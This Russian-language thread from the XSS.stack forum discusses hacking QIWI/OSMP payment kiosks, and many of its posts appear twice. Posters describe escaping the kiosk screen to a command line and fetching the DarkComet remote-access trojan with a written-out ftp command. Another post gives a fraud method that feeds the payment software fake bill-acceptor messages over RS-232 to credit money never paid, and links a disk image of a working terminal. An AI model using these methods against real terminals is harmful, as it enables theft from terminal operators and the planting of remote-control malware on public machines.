трюки с купюрами на липкой ленте, по слухам, кое-где ещё проходят
-
XSS.stack #1 – первый литературный журнал от юзеров форума
взлом аппарата оплаты сотовой связи
- Автор темы aggressor
- Дата начала
Все автоматы сейчас оборудованы купюроприёмником c укладчиком купюр, так что лента уже в прошлом, к сожалению это только слухи.
:pioneer:
недавно появился троян для осмп trojan.PWS.OSMP он вродебы подминяет счета на которые идёт оплата.
недавно появился vladiny, какбэ некропостер...
как красиво сказано, может ты ещё скажешь как открыть там винду???
Да всё уже никак не сломаете! Там же не дураки сидят!
Да, в автомате не сидят дураки, там вообще кроме тараканов нет НИКОГО.
ипать, по мне дак, автомат сидит в основном на какой нить серверной ОС и имеет свой ип, логика подсказывает что, админы подняли на нем RDP и если это не nix то его мона протрянить... хз как в реале. зы: в моем городе все автоматы под виндой, видел пару под никсами, но это всего лишь пара.
У меня был случай увидеть терминал под windows XP.
Иногда часто радует тот факт, что администраторы забывают отключать процесс Explorer.exe и меню ПУСК часто вылазиет впереди программы для оплаты если долго традиционным методом тыкать в угол экрана
. Вообщем я приметил такой терминал в одном из супер маркетов, не далеко от дома.
Потом пришёл домой, загрузил на FTP сервер darkcomet, поставил клиент на левом дедике, вообщем всё как положено.
На следующий день прихожу в супер маркет, покупаю бутылку кулера, иду к терминалу.
Дальше всё по плану:
1.Включил экранную клавиатуру(30 секунд).
2.В командной строке:
C:\windows\system32> ftp hosting.1mb.ru // обращение к серверу
C:\windows\system32> hosting777 // логин
Ну а дальше обломитесь)) Ко мне подошёл охранник(видно что студент) и вежливо попросил продавщицу позвонить в милицию. Пришлось сказать что оно само открылось, я тут ни причём и по тихоньку свалить.
Я знаю что у каких то школьников получилось затроянить терминал, где то об этом даже говорили. Сеть там явно не изолированная.
Иногда часто радует тот факт, что администраторы забывают отключать процесс Explorer.exe и меню ПУСК часто вылазиет впереди программы для оплаты если долго традиционным методом тыкать в угол экрана
. Вообщем я приметил такой терминал в одном из супер маркетов, не далеко от дома.Потом пришёл домой, загрузил на FTP сервер darkcomet, поставил клиент на левом дедике, вообщем всё как положено.
На следующий день прихожу в супер маркет, покупаю бутылку кулера, иду к терминалу.
Дальше всё по плану:
1.Включил экранную клавиатуру(30 секунд).
2.В командной строке:
C:\windows\system32> ftp hosting.1mb.ru // обращение к серверу
C:\windows\system32> hosting777 // логин
Ну а дальше обломитесь)) Ко мне подошёл охранник(видно что студент) и вежливо попросил продавщицу позвонить в милицию.
Пришлось сказать что оно само открылось, я тут ни причём и по тихоньку свалить. Я знаю что у каких то школьников получилось затроянить терминал, где то об этом даже говорили. Сеть там явно не изолированная.
сам видел как снимает специалист с банкомата деньги при охраннике с АК47.
У меня там в том банкомате нижняя панель (откуда лотки с деньгами) внешняя открываеться по коду,вводимого через сервисное меню (оно тоже по коду или еще как-то открываеться,а дальше все-забирай и че-хочешь делай).
У меня там в том банкомате нижняя панель (откуда лотки с деньгами) внешняя открываеться по коду,вводимого через сервисное меню (оно тоже по коду или еще как-то открываеться,а дальше все-забирай и че-хочешь делай).
Dark Koder
Я тебя немного поправлю, ты не против?
1)Не АК 47, а сайга. Похожа конечно же на калашников.
2)Мы говорим про терминалы, а не про банкоматы.
Если говорить о терминалах, то нам нужно 2 ключа. Один чтобы открыть крышку корпуса, а второй чтобы открыть кассу. После вскрытия кассы терминал печатает чек(сколько, какими купюрами, когда были изьяты деньги из кассы).
У банкомата немного другая схема.
Сзади есть либо кодовый заком(как на сейфах) либо клавиатура для вбивания пароля.
После того как ты открыл сейф, то поступает сигнал. И если открытие сейфа произошло, а инкассаторы по графику там быть не могли, то через 5-7 минут на месте будут сотрудники полиции. B)
Я тебя немного поправлю, ты не против?
1)Не АК 47, а сайга. Похожа конечно же на калашников.
2)Мы говорим про терминалы, а не про банкоматы.
Если говорить о терминалах, то нам нужно 2 ключа. Один чтобы открыть крышку корпуса, а второй чтобы открыть кассу. После вскрытия кассы терминал печатает чек(сколько, какими купюрами, когда были изьяты деньги из кассы).
У банкомата немного другая схема.
Сзади есть либо кодовый заком(как на сейфах) либо клавиатура для вбивания пароля.
После того как ты открыл сейф, то поступает сигнал. И если открытие сейфа произошло, а инкассаторы по графику там быть не могли, то через 5-7 минут на месте будут сотрудники полиции. B)
Тут не совсем так.
Это зависит от банка/банкомата.
друг работает в банке, тех.специалистом(ыникейшик + обслуживание банкоматов).
Много раз бывало, когда мы гуляем и видет он, что в ТЦ каком то банкомат не работает. Он без звонка в СБ банка открывает банкомат сзади и перезагружает банкомат или сбрасывает ошибки. НО у него нет доступа к сейфу, где лежат деньги. Туда лезут только инкассаторы и кассир с банка.
Вот столько раз было, что открыли заднюю дверцу банкомата, но никаких маскишоу не приехал.
Много слухов и легенд об взломах этих терминалов. Но в раше сие дияние опасно и могут оторвать именно то, что болтается между ног, не дожидаясь когда вас поймает полиция. Но это все лирика.
Освещать буду только терм. ОСМП. Принцип взлома прост до безобразия:
Внутри аппарата:
Через удаленный доступ подключаемся к терминалу. Мы видим рабочий стол терминала, с помощью мыши тыкаем по меню терминала, выбираем то что нам надо (оператор, вводим номер телефона и т.д.) программа посылает запрос на купюроприемник. Купюроприемник ждет когда мы повтыкиваем ему денег, но так как денег у нас нет, то мы должны вернуть программе сообщение от купюроприемника какую купюру мы якобы воткнули и жмем мышкой оплатить. И однажды тихой ночью, в одиноко стоящем терминале раздастся звук термопринтера (конечно если в нем есть бумага).
Подсказки:
И последнее ISO образ HDD из рабочего терминал ОСМП. HDD на зловреды не проверялся. К сожелению халявы нет так как я не нашел куда залить файл такого объема и по совету уважаемых людей залил его на турбобит.
Скачать|Download
Прямая ссылка для скачивания место на сервере предоставленно пользователем 12309
Освещать буду только терм. ОСМП. Принцип взлома прост до безобразия:
- 1. 99,9% аппаратов работают на хрюше.
- 2. 99.9% имеют включенное приглашение удаленного помошника.
- 3. 100% аппаратов имеют удаленный доступ.
- 4. Все аппараты стучатся на сервер транзакций qiwi (найти адреса их помоему всего 2 (протокол HTTPS) не составит труда).
Внутри аппарата:
- 1. Подобие системного блока (мать (наличие минимум 2х портов RS232 и 1го LPT), HDD, блок питания)
- 2. Блок бесперебойного питания
- 3. Модем gprs сименс МС35
- 4.Купюроприемник КешКод SM (практически не возможно обмануть, может клюнуть только на очень хорошую типографской печати фальшивку, если кто видел на ютуб как в него запихивают простую белую бумажку, то это фейк, либо отключены датчки распознования знаков купюры)
- 5. Термопринтер (наличие обязательно даже если сие устройство перестало выдавать чек)
- 6. Сторож (непонятное устройство, есть не везде, если есть то при несанкционированом вскрытии, отключении питания, перемещении аппарата шлет смс хозяину, возможно издает какието звуки)
- 7. Куча проводов
Через удаленный доступ подключаемся к терминалу. Мы видим рабочий стол терминала, с помощью мыши тыкаем по меню терминала, выбираем то что нам надо (оператор, вводим номер телефона и т.д.) программа посылает запрос на купюроприемник. Купюроприемник ждет когда мы повтыкиваем ему денег, но так как денег у нас нет, то мы должны вернуть программе сообщение от купюроприемника какую купюру мы якобы воткнули и жмем мышкой оплатить. И однажды тихой ночью, в одиноко стоящем терминале раздастся звук термопринтера (конечно если в нем есть бумага).
Подсказки:
- 1. Программа обменивается данными с купюроприемником по протоколу RS-232
- 2. Иногда более прошареный хозяин аппарата ставит туда АВ
И последнее ISO образ HDD из рабочего терминал ОСМП. HDD на зловреды не проверялся. К сожелению халявы нет так как я не нашел куда залить файл такого объема и по совету уважаемых людей залил его на турбобит.
Скачать|DownloadПрямая ссылка для скачивания место на сервере предоставленно пользователем 12309
постучи в пм, дам ftp/ssh доступ к своему серву, зальёшь.
С чего ты взял, что qwasgen станет пытаться впарить трой таким тупым способом?
Терминалы сами по себе не являют образчик защищенности же.
SoLDaT
Возможно твой АВ ругается на файл сtfmon.exe . Программа сtfmon.exe активирует процессор текстового ввода компонента «Альтернативный ввод данных» что в полной мере реализовано в терминалах. Работает в скрытом от пользователя режиме. По поводу этого файла очень много информации в сети.
Но бывает и так что очень многие зловреды маскируются именно под этот процесс.
Возможно твой АВ ругается на файл сtfmon.exe . Программа сtfmon.exe активирует процессор текстового ввода компонента «Альтернативный ввод данных» что в полной мере реализовано в терминалах. Работает в скрытом от пользователя режиме. По поводу этого файла очень много информации в сети.
Но бывает и так что очень многие зловреды маскируются именно под этот процесс.
в одно время знакомый работал в круглосуточном магазине охранником, и постоянно видел что когда приходит оператор, он нажимает на определённые точки(программа просто смотри нажатие по осям) и программа сворачивается показывая ХР'юшу...
P.S. смотрели порнуху на терминале))
P.S.2. а если кто был на найсбиз - помнят код(asm) для терминалов
P.S. смотрели порнуху на терминале))
P.S.2. а если кто был на найсбиз - помнят код(asm) для терминалов
CepbIu
Ну, судя по http://www.osmp.ru/upload/osmp/files/aso/setup_guide.pdf (стр. 12), там вводится "секретный номер телефона" через обычный интерфейс, далее логин-пасс.
PS. Что за код для терминалов, не откроете?
Ну, судя по http://www.osmp.ru/upload/osmp/files/aso/setup_guide.pdf (стр. 12), там вводится "секретный номер телефона" через обычный интерфейс, далее логин-пасс.
PS. Что за код для терминалов, не откроете?
Не правильно поняли. Я говорил не о коде, а о нажатии на определённые "места" на дисплее.